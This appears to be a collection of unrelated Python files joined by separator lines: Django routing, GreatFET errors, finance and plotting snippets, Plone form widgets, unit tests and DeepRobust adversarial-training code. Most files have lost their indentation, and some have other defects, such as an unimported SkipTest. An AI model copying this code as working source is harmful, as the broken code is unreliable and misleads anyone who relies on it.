return PlatformSerializerDetail
return PlatformSerializer
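# A minimal wiring sketch (the "platforms" prefix and placing the router in this
# module are assumptions for illustration, not the project's actual urlconf):
# registering the read-only viewset with a DefaultRouter exposes list and retrieve
# routes, and get_serializer_class() above swaps in the detail serializer only for
# the retrieve action.
from rest_framework.routers import DefaultRouter

router = DefaultRouter()
router.register(r"platforms", PlatformViewSet)
urlpatterns = router.urls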
|
#
# This file is part of GreatFET
#
class DeviceNotFoundError(IOError):
""" Error indicating no GreatFET device was found. """
pass
class DeviceBusyError(IOError):
""" Error indicating the GreatFET is too busy to service the given request. """
pass
class DeviceMemoryError(MemoryError):
""" Error indicating that the GreatFET has run out of memory. """
pass
class NotFoundError(IOError):
""" Error indicating that a resource was not found. """
pass
class GreatFETError(RuntimeError):
""" Runtime error used when no better description is available. """
pass
class ExternalDeviceError(IOError):
"""
Error used when an external device (i.e. a device not on the GreatFET itself)
experiences an issue. This typically means that the error is not with
the GreatFET hardware or software, but may be with e.g. connections.
"""
GREATFET_ERRORS = {
-2: ValueError,
-5: NotFoundError,
-6: DeviceBusyError,
-7: MemoryError,
}
def from_greatfet_error(error_number):
"""
Returns the error class appropriate for the given GreatFET error.
"""
error_class = GREATFET_ERRORS.get(error_number, GreatFETError)
message = "Error {}".format(error_number)
return error_class(message)
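# Quick illustrative check (the error numbers -5 and -99 are just examples):
# explicitly mapped codes resolve to their specific class, anything else falls
# back to GreatFETError.
if __name__ == '__main__':
    assert isinstance(from_greatfet_error(-5), NotFoundError)
    assert isinstance(from_greatfet_error(-99), GreatFETError)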
|
""""
StockReturns_perc and var_95 from the previous exercise is available in your workspace. Use this data to estimate the VaR for the USO oil ETF for 1 to 100 days from now.
We've also defined a function plot_var_scale() that plots the VaR for 1 to 100 days from now.
""""
def plot_var_scale():
# Plot the forecased vs time
plt.plot(forecasted_values[:,0], -1*forecasted_values[:,1])
plt.xlabel('Time Horizon T+i')
plt.ylabel('Forecasted VaR 95 (%)')
plt.title('VaR 95 Scaled by Time', fontsize=18, fontweight='bold')
plt.show()
# Aggregate forecasted VaR
forecasted_values = np.empty([100, 2])
# Loop through each forecast period
for i in range(0, 100):
# Save the time horizon i
forecasted_values[i, 0] = i
# Save the forecasted VaR 95
forecasted_values[i, 1] = var_95*np.sqrt(i+1)
# Plot the results
plot_var_scale()
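# Worked example of the square-root-of-time rule used above (illustrative numbers,
# not taken from the exercise data): a 1% one-day VaR scales to 0.01 * sqrt(25) = 5%
# at a 25-day horizon, which mirrors what the loop stores in
# forecasted_values[24, 1] as var_95 * np.sqrt(25).
assert abs(0.01 * np.sqrt(25) - 0.05) < 1e-12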
|
import matplotlib.pyplot as plt
import pandas as pd
data = pd.read_csv('../TTWO_Fin_Data.csv', header=0, index_col=0, on_bad_lines="skip").transpose()
gtarev = data['Approx. $ Revenue From GTA in Quarter (derived from two rows above)'].str.replace(',', '').astype(float)
nongtarev = data['Approx. $ Revenue From Non-GTA in Quarter (derived from three rows above)'].str.replace(',', '').astype(float)
gtarev.plot.line()
nongtarev.plot.line()
plt.title('GTA and Non-GTA revenues per quarter')
plt.legend(['GTA Revenues', 'Non-GTA revenues'])
plt.show()
|
# -*- coding: utf-8 -*-
"""Module providing form utilities and partials"""
import uuid as uuid_tool
from Acquisition import aq_inner
from Products.Five import BrowserView
from plone import api
from plone.protect.utils import addTokenToUrl
class FormFieldBase(BrowserView):
""" Default widget view
Renders the provided template and view by the widget in question
"""
def __call__(self,
field_type='text-line',
field_identifier=None,
field_name=None,
field_help=None,
field_data=None,
field_error=None,
field_required=False,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_help': field_help,
'field_type': field_type,
'field_error': field_error,
'field_required': field_required,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def render(self):
return self.rendered_widget()
@property
def field_configuration(self):
return self.params['field_data']
def field_name(self):
translation_service = api.portal.get_tool(name="translation_service")
translated_name = translation_service.translate(
self.params['field_name'],
'lra.cos',
target_language=api.portal.get_default_language()
)
return translated_name
def field_css_class(self):
config = self.field_configuration
field_error = self.params['field_error']
base_class = "o-form__field"
class_list = [base_class, ]
modifiers = config["css_class_modifier"]
if self.params['field_type']:
modifiers.append(self.params['field_type'])
if self.params['field_type'] in ['boolean', 'privacy']:
modifiers.append('checkbox')
if self.params['field_required']:
modifiers.append("required")
if field_error and field_error['active'] is True:
modifiers.append("has-error")
for modifier in modifiers:
class_list.append(
"{0}--{1}".format(base_class, modifier)
)
return " ".join(class_list)
def field_data(self):
request_data = self.field_configuration
field_data = dict()
if request_data:
field_data = request_data
return field_data
def field_extra(self):
field_extra_data = dict()
for key, value in self.params.items():
if not key.startswith('field_'):
field_extra_data[key] = value
return field_extra_data
def rendered_widget(self):
context = aq_inner(self.context)
if self.params['field_type']:
view_name = '@@booking-form-field-{0}'.format(
self.params['field_type']
)
rendered_widget = context.restrictedTraverse(view_name)(
field_identifier=self.params['field_identifier'],
field_name=self.field_name(),
field_help_text=self.params['field_help'],
field_error=self.params['field_error'],
field_data=self.field_data(),
field_css_class=self.field_css_class(),
field_required=self.params['field_required'],
field_extra_data=self.field_extra()
)
else:
view_name = '@@booking-form-field-text'
rendered_widget = context.restrictedTraverse(view_name)(
field_identifier=self.params['field_identifier'],
field_name=self.field_name(),
field_help_text=self.params['field_help'],
field_data=self.field_data(),
field_css_class=self.field_css_class(),
field_required=self.params['field_required'],
field_extra_data=self.field_extra()
)
return rendered_widget
class FormFieldTextLine(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
class FormFieldTextArea(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
class FormFieldSelect(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
def field_widget_options(self):
if self.settings()['field_extra_data']:
if 'widget_options' in self.settings()['field_extra_data']:
return self.settings()['field_extra_data']['widget_options']
return None
def widget_options(self):
translation_service = api.portal.get_tool(name="translation_service")
widget_options = dict()
options = self.field_widget_options()
for option_name, option_value in options.items():
widget_options[option_name] = translation_service.translate(
option_value,
'lra.cos',
target_language=api.portal.get_default_language()
)
return widget_options
class FormFieldBoolean(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
class FormFieldPrivacy(BrowserView):
def __call__(self,
field_identifier=None,
field_name=None,
field_data=None,
field_error=None,
**kw):
self.params = {
'field_identifier': field_identifier,
'field_name': field_name,
'field_error': field_error,
'field_data': field_data
}
self.params.update(kw)
return self.render()
def settings(self):
return self.params
def render(self):
return self.index()
def widget_action_url(self):
action_url = "{portal_url}/{privacy_link}".format(
portal_url=api.portal.get().absolute_url(),
privacy_link=self.settings()['field_help_text']['help_text_link_url']
)
return addTokenToUrl(action_url)
|
# Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Test suite for DELETE requests."""
from integration.ggrc import TestCase
from integration.ggrc.query_helper import WithQueryApi
from integration.ggrc.models import factories
from integration.ggrc.api_helper import Api
from ggrc import db
from ggrc.models import all_models
class TestDelete(TestCase, WithQueryApi):
"""Test objects deletion."""
def setUp(self):
super(TestDelete, self).setUp()
self.client.get("/login")
self.api = Api()
def test_delete(self):
"""Deletion is synchronous and triggers compute_attributes."""
control = factories.ControlFactory()
result = self.api.delete(control)
controls = db.session.query(all_models.Control).all()
background_tasks = db.session.query(all_models.BackgroundTask).all()
self.assert200(result)
self.assertEqual(len(controls), 0)
self.assertEqual(len(background_tasks), 1)
self.assertTrue(background_tasks[0].name.startswith("compute_attributes"))
def test_delete_http400(self):
"""Deletion returns HTTP400 if BadRequest is raised."""
with factories.single_commit():
audit = factories.AuditFactory()
factories.AssessmentFactory(audit=audit)
result = self.api.delete(audit)
self.assert400(result)
self.assertEqual(result.json["message"],
"This request will break a mandatory relationship from "
"assessments to audits.")
|
from deeprobust.image.defense.pgdtraining import PGDtraining
from deeprobust.image.attack.pgd import PGD
import torch
from torchvision import datasets, transforms
from deeprobust.image.netmodels.CNN import Net
from deeprobust.image.config import defense_params
"""
LOAD DATASETS
"""
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('deeprobust/image/defense/data', train=True, download=True,
transform=transforms.Compose([transforms.ToTensor()])),
batch_size=256,
shuffle=True)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('deeprobust/image/defense/data', train=False,
transform=transforms.Compose([transforms.ToTensor()])),
batch_size=256,
shuffle=True)
"""
TRAIN DEFENSE MODEL
"""
print('====== START TRAINING =====')
model = Net()
defense = PGDtraining(model, 'cuda')
defense.generate(train_loader, test_loader, **defense_params["PGDtraining_MNIST"])
print('====== FINISH TRAINING =====')
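"""
EVALUATE AGAINST PGD (optional sketch)
"""
# The PGD attack imported above is unused in this script. A hedged sketch of how
# the defended model could be probed with it is given below as comments; the
# attack_params import and its "PGD_MNIST" key are assumptions about deeprobust's
# config module, not taken from this example, so adjust to the installed version.
# from deeprobust.image.config import attack_params
# adversary = PGD(model, 'cuda')
# x, y = next(iter(test_loader))
# x_adv = adversary.generate(x.to('cuda'), y.to('cuda'), **attack_params["PGD_MNIST"])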
|
"""
=======
License
=======
Copyright (c) 2014 Thomas Lehmann
Permission is hereby granted, free of charge, to any person obtaining a copy of this
software and associated documentation files (the "Software"), to deal in the Software
without restriction, including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies
or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# pylint: disable=R0201
import unittest
from hamcrest import assert_that, equal_to
from concept.math.matrix import Matrix
from concept.tools.decorator import validate_test_responsibility_for
def create_matrix(width, height, start=1):
"""
Create a test matrix.
:param width: number of columns for matrix
:param height: number of rows for matrix
:param start: let value start with given value (default: 1)
:returns: matrix instance
"""
matrix = Matrix(width, height)
value = start
for row in range(height):
for column in range(width):
matrix[column, row] = value
value += 1
return matrix
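# Illustrative note (added for clarity, consistent with test_setitem below): values
# are filled row by row, so create_matrix(2, 2).data == [[1, 2], [3, 4]] and
# create_matrix(3, 2, start=5).data == [[5, 6, 7], [8, 9, 10]].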
@validate_test_responsibility_for(Matrix)
@validate_test_responsibility_for(Matrix.Cell, True)
@validate_test_responsibility_for(Matrix.Row, True)
@validate_test_responsibility_for(Matrix.Column, True)
@validate_test_responsibility_for(Matrix.Diagonal, True)
class TestMatrix(unittest.TestCase):
""" Testing of class concept.math.matrix.Matrix. """
def test_init(self):
""" Testing of Matrix.__init__, Matrix.width and Matrix.height. """
matrix = Matrix(2, 3)
assert_that(len(matrix.data), equal_to(3))
assert_that(len(matrix.data[0]), equal_to(2))
def test_len(self):
""" Testing of Matrix.height method. """
matrix = Matrix(2, 3)
assert_that(len(matrix), equal_to(3))
def test_setitem(self):
""" Testing of Matrix.__setitem__ method. """
matrix = create_matrix(2, 2)
assert_that(matrix.data[0], equal_to([1, 2]))
assert_that(matrix.data[1], equal_to([3, 4]))
def test_getitem(self):
""" Testing of Matrix.__getitem__ method. """
matrix = create_matrix(2, 2)
assert_that(matrix[0, 0], equal_to(1))
assert_that(matrix[1, 0], equal_to(2))
assert_that(matrix[0, 1], equal_to(3))
assert_that(matrix[1, 1], equal_to(4))
def test_delitem(self):
""" Testing of Matrix.__delitem__ method. """
matrix = create_matrix(2, 2)
del matrix[1, 0]
del matrix[0, 1]
assert_that(matrix[1, 0], equal_to(0))
assert_that(matrix[0, 1], equal_to(0))
def test_create_data(self):
""" Testing of Matrix.create_data static method """
assert_that(Matrix.create_data(3, 2), equal_to([[0, 0, 0], [0, 0, 0]]))
def test_set(self):
""" Testing of Matrix.set method """
matrix = create_matrix(2, 2)
success = matrix.set([99, 88, 77, 66])
assert_that(success, equal_to(True))
assert_that([cell.get() for cell in matrix.cells()], [99, 77, 88, 66])
# more values than matrix has
success = matrix.set([1, 2, 3, 4, 5])
assert_that(success, equal_to(False))
def test_repr(self):
""" Testing of Matrix.__repr__ method """
matrix = create_matrix(3, 2)
expected = "Matrix(3x2:1,4,2,5,3,6)"
assert_that(str(matrix), equal_to(expected))
def test_rows(self):
""" Testing of Matrix.rows method """
matrix = create_matrix(2, 2)
for expected, given in zip([[1, 2], [3, 4]], [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
def test_columns(self):
""" Testing of Matrix.columns method """
matrix = create_matrix(2, 2)
for expected, given in zip([[1, 3], [2, 4]], [row.get() for row in matrix.columns()]):
self.assertEqual(expected, given)
def test_diagonals(self):
""" Testing of Matrix.diagonals method """
matrix = create_matrix(2, 2)
for expected, given in zip([[1], [3, 2], [4]],
[diagonal.get() for diagonal in matrix.diagonals()]):
self.assertEqual(expected, given)
def test_main_diagonals(self):
""" Testing of Matrix.main_diagonals method """
matrix = create_matrix(2, 2)
for expected, given in zip([[1, 4], [3, 2]],
[diagonal.get() for diagonal in matrix.main_diagonals()]):
self.assertEqual(expected, given)
def test_cells(self):
""" Testing of Matrix.cells method """
matrix = create_matrix(2, 2)
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([1, 3, 2, 4], values)
def test_clone(self):
""" Testing of Matrix.clone method """
matrix_a = create_matrix(2, 2)
matrix_b = matrix_a.clone()
self.assertEqual(matrix_a.data, matrix_b.data)
def test_add(self):
""" Testing of Matrix.__add__ method. """
matrix_a = create_matrix(2, 2, start=1)
matrix_b = create_matrix(2, 2, start=5)
matrix_c = matrix_a + matrix_b
for expected, given in zip([[6, 8], [10, 12]], [row.get() for row in matrix_c.rows()]):
self.assertEqual(expected, given)
# you cannot say: "matrix + 1234"
self.assertRaises(TypeError, matrix_a.__add__, 1234)
def test_flip(self):
""" Testing of Matrix.flip method """
# testing with even rows and columns
matrix = create_matrix(2, 2)
matrix.flip(True, False)
for expected, given in zip([[3, 4], [1, 2]], [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
matrix.flip(False, True)
for expected, given in zip([[4, 3], [2, 1]], [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
matrix.flip(True, True)
for expected, given in zip([[1, 2], [3, 4]], [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
# testing with odd rows and columns
matrix = create_matrix(3, 3)
matrix.flip(True, False)
expected_data = [[7, 8, 9], [4, 5, 6], [1, 2, 3]]
for expected, given in zip(expected_data, [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
matrix.flip(False, True)
expected_data = [[9, 8, 7], [6, 5, 4], [3, 2, 1]]
for expected, given in zip(expected_data, [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
matrix.flip(True, True)
expected_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
for expected, given in zip(expected_data, [row.get() for row in matrix.rows()]):
self.assertEqual(expected, given)
def test_cell_init(self):
""" Testing of Matrix.Cell.__init__ method """
cell = Matrix.Cell(1, 2, None)
self.assertEqual(1, cell.column)
self.assertEqual(2, cell.row)
self.assertEqual(None, cell.matrix)
def test_cell_get(self):
""" Testing of Matrix.Cell.get method """
matrix = create_matrix(2, 2)
self.assertEqual(1, list(matrix.cells())[0].get())
self.assertEqual(3, list(matrix.cells())[1].get())
self.assertEqual(2, list(matrix.cells())[2].get())
self.assertEqual(4, list(matrix.cells())[-1].get())
def test_cell_set(self):
""" Testing of Matrix.Cell.set method """
matrix = create_matrix(2, 2)
cells = [cell for cell in matrix.cells() if cell.row == 0]
for cell in cells:
cell.set(cell.get() * 10)
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([10, 3, 20, 4], values)
def test_cell_repr(self):
""" Testing of Matrix.Cell.__repr__ method """
matrix = create_matrix(2, 2)
cell = list(matrix.cells())[0]
self.assertEqual("cell(0, 0, 1)", str(cell))
cell = list(matrix.cells())[-1]
self.assertEqual("cell(1, 1, 4)", str(cell))
def test_cell_swap(self):
""" Testing of Matrix.Cell.__repr__ method """
matrix = create_matrix(2, 2)
cell_a = list(matrix.cells())[0]
cell_b = list(matrix.cells())[-1]
cell_a.swap(cell_b)
self.assertEqual("cell(0, 0, 4)", str(cell_a))
self.assertEqual("cell(1, 1, 1)", str(cell_b))
# wrong type to swap with
self.assertRaises(TypeError, cell_a.swap, 1234)
def test_row_init(self):
""" Testing of Matrix.Row.__init__ method """
instance = Matrix.Row(1, None)
self.assertEqual(1, instance.row)
self.assertEqual(None, instance.matrix)
def test_row_set(self):
""" Testing of Matrix.Row.set method """
matrix = create_matrix(2, 2)
# last row:
row = list(matrix.rows())[-1]
row.set([5, 6])
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([1, 5, 2, 6], values)
def test_row_get(self):
""" Testing of Matrix.Row.get method """
matrix = create_matrix(2, 2)
# first row:
row = list(matrix.rows())[0]
self.assertEqual([1, 2], row.get())
# last row:
row = list(matrix.rows())[-1]
self.assertEqual([3, 4], row.get())
def test_row_swap(self):
""" Testing of Matrix.Row.swap method """
matrix = create_matrix(2, 2)
# first row:
row_a = list(matrix.rows())[0]
row_b = list(matrix.rows())[-1]
row_a.swap(row_b)
self.assertEqual([3, 4], row_a.get())
self.assertEqual([1, 2], row_b.get())
# wrong type to swap with
self.assertRaises(TypeError, row_a.swap, 1234)
def test_row_cells(self):
""" Testing of Matrix.Row.cells method """
matrix = create_matrix(2, 2)
row = list(matrix.rows())[-1]
self.assertEqual([3, 4], [cell.get() for cell in row.cells()])
def test_column_init(self):
""" Testing of Matrix.Column.__init__ method """
instance = Matrix.Column(1, None)
self.assertEqual(1, instance.column)
self.assertEqual(None, instance.matrix)
def test_column_get(self):
""" Testing of Matrix.Row.get method """
matrix = create_matrix(2, 2)
# first column:
column = list(matrix.columns())[0]
self.assertEqual([1, 3], column.get())
# last column:
column = list(matrix.columns())[-1]
self.assertEqual([2, 4], column.get())
def test_column_set(self):
""" Testing of Matrix.Row.set method """
matrix = create_matrix(2, 2)
# last column:
column = list(matrix.columns())[-1]
column.set([5, 6])
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([1, 3, 5, 6], values)
def test_column_swap(self):
""" Testing of Matrix.Column.swap method """
matrix = create_matrix(2, 2)
# first and last columns:
column_a = list(matrix.columns())[0]
column_b = list(matrix.columns())[-1]
column_a.swap(column_b)
self.assertEqual([2, 4], column_a.get())
self.assertEqual([1, 3], column_b.get())
# wrong type to swap with
self.assertRaises(TypeError, column_a.swap, 1234)
def test_column_cells(self):
""" Testing of Matrix.Column.cells method """
matrix = create_matrix(2, 2)
column = list(matrix.columns())[-1]
self.assertEqual([2, 4], [cell.get() for cell in column.cells()])
def test_diagonal_init(self):
""" Testing of Matrix.Diagonal.__init__ method """
instance = Matrix.Diagonal(0, 1, 2, 3, None)
self.assertEqual(0, instance.column)
self.assertEqual(1, instance.row)
self.assertEqual(2, instance.step_column)
self.assertEqual(3, instance.step_row)
self.assertEqual(None, instance.matrix)
def test_diagonal_get(self):
""" Testing of Matrix.Diagonal.get method """
matrix = create_matrix(2, 2)
diagonals = list(matrix.diagonals())
self.assertEqual(3, len(diagonals))
self.assertEqual([1], diagonals[0].get())
self.assertEqual([3, 2], diagonals[1].get())
self.assertEqual([4], diagonals[2].get())
def test_diagonal_cells(self):
""" Testing of Matrix.Diagonal.cells method. """
matrix = create_matrix(2, 2)
given_values = [cell.get() for diagonal in matrix.diagonals() for cell in diagonal.cells()]
self.assertEqual([1, 3, 2, 4], given_values)
def test_diagonal_set(self):
""" Testing of Matrix.Diagonal.set method. """
matrix = create_matrix(2, 2)
# middle diagonal:
diagonal = list(matrix.diagonals())[1]
diagonal.set([8, 9])
values = [cell.get() for cell in matrix.cells()]
self.assertEqual([1, 8, 9, 4], values)
def test_mul(self):
""" Testing of Matrix.__mul__ method """
self.sub_test_mul_factor()
self.sub_test_mul_matrix_matrix()
self.sub_test_mul_bad()
def sub_test_mul_factor(self):
""" Testing of Matrix.__mul__ method for matrix with a factor """
matrix_a = create_matrix(2, 2)
matrix_b = matrix_a * 10
values = [cell.get() for cell in matrix_b.cells()]
self.assertEqual([10, 30, 20, 40], values)
def sub_test_mul_matrix_matrix(self):
""" Testing of Matrix.__mul__ method of two matrices """
matrix_a = create_matrix(3, 4)
matrix_b = create_matrix(2, 3)
matrix_c = matrix_a * matrix_b
self.assertEqual(matrix_a.height, matrix_c.height)
self.assertEqual(matrix_b.width, matrix_c.width)
expected_rows = [[22, 28], [49, 64], [76, 100], [103, 136]]
for expected, given in zip(expected_rows, [row.get() for row in matrix_c.rows()]):
self.assertEqual(expected, given)
def sub_test_mul_bad(self):
""" Testing of Matrix.__mul__ method of a matrix with an unsupported object. """
matrix = create_matrix(2, 2)
assert_that(matrix * "text", equal_to(None))
|
#! /usr/bin/env python
import sys
speeds = dict()
# for the extension we will need another dictionary
# counts = dict()
for line in sys.stdin:
    try:
        line = line.strip()
        station, speed = line.split('\t')
        speed = float(speed)
        # Assumption (not stated in the skeleton): track the highest speed seen
        # per station by keeping a running maximum.
        speeds[station] = max(speed, speeds.get(station, speed))
    except ValueError:
        pass
for k, v in speeds.items():
    # Emit one tab-separated "station<TAB>speed" line per station.
    print("{0}\t{1}".format(k, v))
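# Usage sketch (file and path names are placeholders, not from the exercise):
# this script expects "station<TAB>speed" lines on stdin, so it can be smoke
# tested locally by piping sorted mapper output into it, or submitted through the
# Hadoop Streaming jar with its -mapper/-reducer/-input/-output options.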
|
#!/usr/bin/env python
import numpy as np
import os, tempfile
import pickle
from pymvg.camera_model import CameraModel
from pymvg.util import point_msg_to_tuple, parse_rotation_msg
import pymvg.align as mcsc_align
from pymvg.test.utils import _build_test_camera, get_default_options
# --------------------- testing -----------------------------
def _generate_uv_raw(width,height):
step = 5
border = 65
uv_raws = []
for row in range(border, height-border, step):
for col in range(border, width-border, step):
uv_raw = [col, row]
uv_raws.append(uv_raw)
return np.array(uv_raws)
def test_dict_roundtrip():
all_options = get_default_options()
for opts in all_options:
yield check_dict_roundtrip, opts
def check_dict_roundtrip(cam_opts):
cam = _build_test_camera(**cam_opts)
d = cam.to_dict()
cam2 = CameraModel.from_dict(d)
assert cam==cam2
def test_projection_to_undistorted1():
at_origin=True # this test mathematically only makes sense for a camera at the origin
for ROS_test_data in (True,False):
opts = dict(at_origin=at_origin,ROS_test_data=ROS_test_data)
yield check_projection_to_undistorted1, opts
def check_projection_to_undistorted1(cam_opts):
"""check that points along optical axis are imaged onto principal point"""
cam = _build_test_camera(**cam_opts)
for z in np.linspace(0.1, 10, 20):
pt = np.array([[0,0,z]])
result = cam.project_3d_to_pixel( pt, distorted=False )
u,v = result[0]
assert np.allclose(u, cam.P[0,2])
assert np.allclose(v, cam.P[1,2])
def test_camera_distortion_roundtrip():
all_options = get_default_options()
for opts in all_options:
yield check_camera_distortion_roundtrip, opts
def check_camera_distortion_roundtrip(cam_opts):
"""check that uv == distort( undistort( uv ))"""
cam = _build_test_camera(**cam_opts)
uv_raw = _generate_uv_raw(cam.width, cam.height)
uv_rect = cam.undistort( uv_raw )
uv_unrect = cam.distort( uv_rect )
assert uv_raw.shape == uv_unrect.shape
assert np.allclose(uv_raw, uv_unrect, atol=1.0) # within one pixel
def test_camera_projection_roundtrip():
all_options = get_default_options()
for distorted in (True,False):
for opts in all_options:
yield check_camera_projection_roundtrip, opts, distorted
def check_camera_projection_roundtrip(cam_opts,distorted=False):
"""check that uv == project_to_2d( project_to_3d( uv ))"""
cam = _build_test_camera(**cam_opts)
uv_raw = _generate_uv_raw(cam.width, cam.height)
pts3d = cam.project_pixel_to_3d_ray( uv_raw, distorted=distorted )
uv_unrect = cam.project_3d_to_pixel( pts3d, distorted=distorted )
assert uv_raw.shape == uv_unrect.shape
assert np.allclose(uv_raw, uv_unrect, atol=1.0) # within one pixel
def test_extrinsic_msg():
all_options = get_default_options()
for opts in all_options:
yield check_extrinsic_msg, opts
def check_extrinsic_msg(cam_opts):
"""check that ROS message contains actual camera extrinsic parameters"""
cam_opts = cam_opts.copy()
cam_opts['get_input_data']=True
r = _build_test_camera(**cam_opts)
cam = r['cam']
tfm = cam.get_extrinsics_as_bunch()
if 'translation' in r:
assert np.allclose(point_msg_to_tuple(tfm.translation), point_msg_to_tuple(r['translation']))
if 'rotation' in r:
assert np.allclose(parse_rotation_msg(tfm.rotation,force_matrix=True),
parse_rotation_msg(r['rotation'],force_matrix=True))
def test_build_from_M():
all_options = get_default_options()
for opts in all_options:
yield check_built_from_M, opts
def check_built_from_M(cam_opts):
"""check that M is preserved in load_camera_from_M() factory"""
cam_orig = _build_test_camera(**cam_opts)
M_orig = cam_orig.get_M()
cam = CameraModel.load_camera_from_M( M_orig )
assert np.allclose( cam.get_M(), M_orig)
def test_align():
all_options = get_default_options()
for opts in all_options:
yield check_align, opts
def check_align(cam_opts):
cam_orig = _build_test_camera(**cam_opts)
M_orig = cam_orig.get_M()
cam_orig = CameraModel.load_camera_from_M( M_orig )
R1 = np.eye(3)
R2 = np.zeros((3,3))
R2[0,1] = 1
R2[1,0] = 1
R2[2,2] = -1
t1 = np.array( (0.0, 0.0, 0.0) )
t2 = np.array( (0.0, 0.0, 0.1) )
t3 = np.array( (0.1, 0.0, 0.0) )
for s in [1.0, 2.0]:
for R in [R1, R2]:
for t in [t1, t2, t3]:
cam_actual = cam_orig.get_aligned_camera( s, R, t )
M_expected = mcsc_align.align_M( s,R,t, M_orig )
cam_expected = CameraModel.load_camera_from_M( M_expected )
assert cam_actual==cam_expected
def test_problem_M():
"""check a particular M which previously caused problems"""
# This M (found by the DLT method) was causing me problems.
d = {'width': 848,
'name': 'camera',
'height': 480}
M = np.array([[ -1.70677031e+03, -4.10373295e+03, -3.88568028e+02, 6.89034515e+02],
[ -6.19019195e+02, -1.01292091e+03, -2.67534989e+03, 4.51847857e+02],
[ -4.52548832e+00, -3.78900498e+00, -7.35860226e-01, 1.00000000e+00]])
cam = CameraModel.load_camera_from_M( M, **d)
#assert np.allclose( cam.M, M) # we don't expect this since the intrinsic matrix may not be scaled
verts = np.array([[ 0.042306, 0.015338, 0.036328, 1.0],
[ 0.03323, 0.030344, 0.041542, 1.0],
[ 0.036396, 0.026464, 0.052408, 1.0]])
actual = cam.project_3d_to_pixel(verts[:,:3])
expectedh = np.dot( M, verts.T )
expected = (expectedh[:2]/expectedh[2]).T
assert np.allclose( expected, actual )
def test_distortion_yamlfile_roundtrip():
all_options = get_default_options()
for opts in all_options:
yield check_distortion_yamlfile_roundtrip, opts
def check_distortion_yamlfile_roundtrip(cam_opts):
"""check that roundtrip of camera model to/from a yaml file works"""
cam = _build_test_camera(**cam_opts)
fname = tempfile.mktemp(suffix='.yaml')
cam.save_intrinsics_to_yamlfile(fname)
try:
cam2 = CameraModel.load_camera_from_file( fname, extrinsics_required=False )
finally:
os.unlink(fname)
distorted = np.array( [[100.0,100],
[100,200],
[100,300],
[100,400]] )
orig_undistorted = cam.undistort( distorted )
reloaded_undistorted = cam2.undistort( distorted )
assert np.allclose( orig_undistorted, reloaded_undistorted )
def test_camera_mirror_projection_roundtrip():
all_options = get_default_options()
for axis in ('lr','ud'):
for distorted in (True,False):
for opts in all_options:
yield check_camera_mirror_projection_roundtrip, opts, distorted, axis
def check_camera_mirror_projection_roundtrip(cam_opts,distorted=False,axis='lr'):
"""check that a mirrored camera gives reflected pixel coords"""
cam_orig = _build_test_camera(**cam_opts)
cam_mirror = cam_orig.get_mirror_camera(axis=axis)
uv_raw = _generate_uv_raw(cam_orig.width, cam_orig.height)
# Get a collection of 3D points for which we know the pixel locations.
pts3d = cam_orig.project_pixel_to_3d_ray( uv_raw, distorted=distorted )
# Now project that through our mirror-image camera.
uv_mirror = cam_mirror.project_3d_to_pixel( pts3d, distorted=distorted )
# The mirrored pixel coordinates should satisfy x_new = width - x (or y_new = height - y).
expected = np.array(uv_raw)
if axis=='lr':
expected[:,0] = cam_orig.width - uv_raw[:,0]
else:
expected[:,1] = cam_orig.height - uv_raw[:,1]
assert expected.shape == uv_mirror.shape
assert np.allclose(expected, uv_mirror, atol=1.0) # within one pixel
def test_flip():
all_options = get_default_options()
for opts in all_options:
yield check_flip, opts
def check_flip(cam_opts):
cam_orig = _build_test_camera(**cam_opts)
try:
cam_flip = cam_orig.get_flipped_camera()
except NotImplementedError as err:
raise SkipTest(str(err))
# They have different orientation (but same position) in space,
assert not np.allclose( cam_orig.get_rotation(), cam_flip.get_rotation())
assert np.allclose( cam_orig.get_camcenter(), cam_flip.get_camcenter())
